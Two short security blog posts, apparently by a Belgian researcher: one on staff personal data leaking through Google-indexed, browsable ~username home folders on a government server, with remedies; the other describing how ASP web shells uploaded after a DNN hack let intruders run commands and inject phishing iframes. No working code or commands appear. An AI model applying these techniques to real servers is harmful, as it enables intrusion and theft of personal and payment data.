Sensitive data on personal home folders found thanks to Google!

I can imagine that there are some people who make use of a mailing list. A way to quickly communicate in case certain events happen. These mailing lists are mostly to be used for personal reasons. And as for this personal reason, they get stored on a personal share on the network. Also known as your personal home folder. So far nothing wrong.

But what happens if these personal homefolders are browsable from the internet?

As from that moment, we have generated a data leak.

This is a situation which I bumped into with a Belgian Governmental organization, which I will not mention by name as they are very collaborative to get the problem fixed. The content of info which I read via a cached Google page, was of a similar kind of data leak to that what I found earlier this year with "dghr.mil.be". Names,location,phone, job title, email, etc... Nothing special you would think but still useful information for identity theft and surely a good case for the Belgian Privacy Commission.

But who is to blame?

Looking to the information published on the site, it seems that the purpose of the server is rather to provide a presentation of staff. Staff can publish an introduction about themselves and maybe, if allowed, their academic work.
So the sysadmin could claim that it's the users mistake to have published some internal data.
But if we look to the URL it seems to switch to a commonly used format for personal home folder http://<server>/~<username>
So maybe the user was not aware that his private folder was open to the public.

What can we learn from this? And what did we propose to the organization involved?

1. Make clear guidelines about which location on the network will be made public.
2. Disable directory browsing to avoid Google/people to snoop around and harvest information which might store sensitive data.
3. Regularly perform audits. This can be done automated. Screening of content which only triggers an alarm toward the user. Then this user can decide if their might be a security violation.

Security is as strong as it's weakest link.

Confidentiality dangers of defaced websites by using shells

In my previous post I explained how you might abuse the DNN hack to modify or upload files on a vulnerable web server. Many hosts, which were reported to be infected by Sejeal and HMei7, have still not taken any action as the evidence is still available. They might reconsider their lack of administration. 

Once a person in able to upload a file to your web server, he will be able to upload a "shell". Many of those shell versions are freely available on the net. eg.: shell ASP
 

 

The ASP script aspshell.asp is a simple web application that provides a shell like environment for administering Microsoft IIS web servers. Commands submitted from a web browser are executed on the web server. The output is transferred back and dumped in the browser window. 

 

This means that the person who can access this shell, is able to manage your complete webserver. 

He can also insert an iframe into your webpage and have a spoofed webpage shown to your customers. Maybe this page asks for personal details, login details, creditcard details, ... and next to keeping the information to itself, it will send the output also to your web server back so nobody gets suspicious.

The scenarios you could build with this idea don't have a limit. 

Sysadmins should monitor their servers and act asap. Otherwise they are playing with the confidentiality of their customers.

NOTE: All this for educational purpose. I am not responsibility for any kind of problems which you cause in careless usage.